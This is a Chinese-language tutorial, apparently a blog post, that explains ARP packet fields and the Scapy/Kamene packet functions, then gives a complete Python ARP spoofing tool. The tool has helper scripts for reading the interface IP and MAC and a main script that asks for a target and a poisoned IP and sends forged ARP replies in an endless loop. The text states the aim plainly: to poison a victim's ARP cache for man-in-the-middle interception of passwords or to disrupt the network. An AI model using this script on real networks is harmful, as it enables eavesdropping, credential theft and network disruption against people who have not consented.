一、ARP报文结构

   ARP（地址解析协议）是根据IP地址获取物理地址的一个TCP/IP协议。
报文结构

ARP报文结构

字段解释

• Ethernet Address of destination
  长度：48比特
  含义：目的以太网地址。发送ARP请求时，为广播的MAC地址0xFF.FF.FF.FF.FF.FF。
• Ethernet Address of sender
  长度：48比特
  含义：源以太网地址。
• Frame Type
  长度：16比特
  含义：表示后面数据的类型。对于ARP请求或应答来说，该字段的值为0x0806。
• Hardware Type
  长度：16比特
  含义：表示硬件地址的类型。对于以太网，该类型的值为“1”。
• Protocol Type
  长度：16比特
  含义：表示发送方要映射的协议地址类型。对于IP地址，该值为0x0800。
• Hardware Length
  长度：8比特
  含义：表示硬件地址的长度，单位是字节。对于ARP请求或应答来说，该值为6。
• Protocol Length
  长度： 8比特
  含义：表示协议地址的长度，单位是字节。对于ARP请求或应答来说，该值为4。
• OP
  长度：16比特
  操作类型:
    1 ARP请求
    2 ARP应答
    3 RARP请求
    4 RARP应答
• Ethernet Address of sender
  长度：48比特
  含义：发送方以太网地址。这个字段和ARP报文首部的源以太网地址字段是重复信息。
• IP Address of sender
  长度：32比特
  发送方的IP地址。
• Ethernet Address of destination
  长度：48比特
  含义：接收方的以太网地址。发送ARP请求时，该处填充值为0x00.00.00.00.00.00。
• IP Address of destination
  长度：32比特
  含义：接收方的IP地址。

二、Scapy相关函数介绍

  Scapy是基于Python语言的网络报文处理程序，它可以让用户发送、嗅探、解析、以及伪造网络报文，运用Scapy可以进行网路侦测、端口扫描、路由追踪、以及网络攻击。Kamene是Scapy的分支，一开始的Scapy并不支持Python 3，为了支持Python 3就诞生了Scapy3k这个分支，为了方便区分就把Scapy3k更名为了Kamene。注意：最新的Scapy是支持Python 3的(Scapy 2.4.0+)。

• 收发数据包
  • 发送并接收数据包（sr）
    sr()：发送三层数据包，等待接受一个或者多个数据包的响应。
    sr1( )：发送三层数据包，并仅仅只等待接受一个数据包的响应。
    srp()：发送二层数据包，并且等待响应。
  • 发送数据包
    send()：仅仅发送三层数据包，系统会自动处理路由和二层信息。
    sendp()：发送二层数据包。

  带p字母的都是发送二层数据包，必须要写以太网头部Ether(),而且如果是多接口一定要指定接口不带p字母都是发送三层数据包，不需要填Ether头部,不需要指定接口。

• 对数据包进行解析
  • srp()
    返回的结果是一个元组，第一个元素表示回复的结果，第二个元素表示无响应的结果
  • res()
    对返回的数据包生成一个list
  • haslayer()
    用于判断是否存在该层数据
  • getlayer（）
    返回该层数据
  • fields()
    把数据包内容生成一个字典数据类型

三、实现ARP扫描

3.1 ARP扫描原理

  假设A(10.0.1.2)与C(10.0.1.1)在同一局域网，A要和C实现通信。A首先会发送一个数据包到广播地址(10.0.1.255)，该数据包中包含了源IP（A）、源MAC、目的IP（C）、目的MAC，这个数据包会被发放给局域网中所有的主机，但是只有C主机会回复一个包含了源IP（）、源MAC、目的IP（A）、目的MAC的数据包给A，同时A主机会将返回的这个地址保存在ARP缓存表中。
  ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP响应，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。攻击者B向电脑A发送一个伪造的ARP响应，告诉电脑A：电脑C的IP地址10.0.1.1对应的MAC地址是B.B.B.B，电脑A信以为真，将这个对应关系写入自己的ARP缓存表中，以后发送数据时，将本应该发往电脑B的数据发送给了攻击者。同样的，攻击者B向电脑C也发送一个伪造的ARP响应，告诉电脑C：电脑C的IP地址10.0.1.1对应的MAC地址是B.B.B.B，电脑C也会将数据发送给攻击者。至此攻击者就控制了电脑A和电脑C之间的流量，他可以选择被动地监测流量，获取密码和其他涉密信息，也可以伪造数据，改变电脑A和电脑C之间的通信内容。

ARP欺骗

3.2 实验环境

  实验所使用的攻击主机系统为为Censtos7，使用两张网卡，因此需要单独获取不同网卡的信息。

3.3 Python 实现

• 获取主机接口的IP地址
  使用Python脚本GET_IP.py,其内容如下：

#!/usr/bin/python3
# -*- coding=utf-8 -*-

import socket
import fcntl
import struct
  
def get_ip_address(ifname):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(
        s.fileno(),
        0x8915,  # SIOCGIFADDR
        struct.pack('256s', (ifname[:15]).encode())
    )[20:24])

• 获取主机接口的MAC地址
  使用Python脚本GET_MAC.py,其内容如下：

#!/usr/bin/python3
# -*- coding=utf-8 -*-

import os
import re#导入正则表达式模块
import optparse

def get_mac_address(iface):#定义获取MAC地址的模块，传入接口名字
    """获取接口MAC"""
    #data = commands.getoutput("ifconfig " + iface)
    data = os.popen("ifconfig " + iface).read()#运行linux系统命令‘ifconfig’，并且读取输出信息赋值到data
    words = data.split()#把data中的数据通过空格分隔，并且产生清单
    found = 0#是否找到MAC地址
    location = 0#搜索清单的位置记录
    index = 0#MAC地址所在清单中的位置
    for x in words:#遍历整个清单
        if re.match('\w\w:\w\w:\w\w:\w\w:\w\w:\w\w', x):#匹配MAC地址字段
            found = 1#MAC地址被找到
            index = location#记录MAC地址出现的位置
            break#跳出循环
        else:#如果没有匹配MAC地址字段
            location = location + 1#继续执行循环，收索下一个位置，所以location需要加1
    if found == 1:#如果MAC地址被找到
        mac = words[index]#提取清单中MAC地址（通过记录的位置），并且赋值到mac
    else:#如果没有找到MAC地址
        mac = 'Mac not found'#返回MAC地址没找到的信息
    return mac#返回mac

• 实现ARP欺骗
  具体实现脚本如下：

from kamene.all import *
from Network.Tools.GET_IP import get_ip_address
from Network.Tools.GET_MAC import get_mac_address #导入获取本机MAC地址方法
import time

global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname

def get_arp(ip_address, ifname):
    '''
      获取IP地址对应的MAC地址
    '''
    #获取本机IP地址
    localip = get_ip_address(ifname)
    #获取本机MAC地址
    localmac = get_mac_address(ifname)
    pkt=Ether(src=localmac, dst='FF:FF:FF:FF:FF:FF')/ARP(op=1, hwsrc=localmac, hwdst='00:00:00:00:00:00', psrc=localip, pdst=ip_address)
    #发送ARP请求并等待响应,超时时间：timeout=1
    result_raw = srp(pkt, timeout=1,iface = ifname, verbose = False)
    #把响应的数据包对，产生为清单
    result_list = result_raw[0].res
    #[0]第一组响应数据包
    #[1]接受到的包，[0]为发送的数据包
    #[1]ARP头部字段中的['hwsrc']字段，作为返回值返回
    mac=str(result_list[0][1].getlayer(ARP).fields['hwsrc'])
    return mac
def arp_spoof(ip_1, ip_2, ifname):
    '''
     用本机的MAC去替换被攻击主机arp表中被毒化IP的MAC
    '''
    #global localip,localmac,ip_1_mac,ip_2_mac,g_ip_1,g_ip_2,g_ifname #申明全局变量
    g_ip_1 = ip_1 #为全局变量赋值，g_ip_1为被毒化ARP设备的IP地址
    g_ip_2 = ip_2 #为全局变量赋值，g_ip_2为本机伪装设备的IP地址
    g_ifname = ifname #为全局变量赋值，攻击使用的接口名字
    #获取本机IP地址，并且赋值到全局变量localip
    localip = get_ip_address(ifname)
    #获取本机MAC地址，并且赋值到全局变量localmac
    localmac = get_mac_address(ifname)
    #获取ip_1的真实MAC地址
    ip_1_mac = get_arp(ip_1,ifname)
    while True:#一直攻击，直到ctl+c出现！！！
        #op=2,响应ARP
        pkt=Ether(src=localmac, dst=ip_1_mac) / ARP(op=2, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1)
        # sendp(pkt)方式，根据二层发包，但不接收响应包
        sendp(pkt, iface = g_ifname, verbose = False)
        print("发送ARP欺骗数据包！欺骗" + ip_1 + '本地MAC地址为' + ip_2 + '的MAC地址！！！')
        time.sleep(1)

if __name__ == "__main__":
    ip1=input("攻击目标IP>>>")
    ifname=input("接口名称>>>")
    ip2=input("毒化的IP>>>")
    arp_spoof(ip1, ip2, ifname)

• 执行效果
  使用Pycharm运行结果如下
  Pycharm执行
  在linux接口下使用Tcpdump抓包如下，向目标主机发送大量arp reply刷新其arp表。
  TCP dump抓包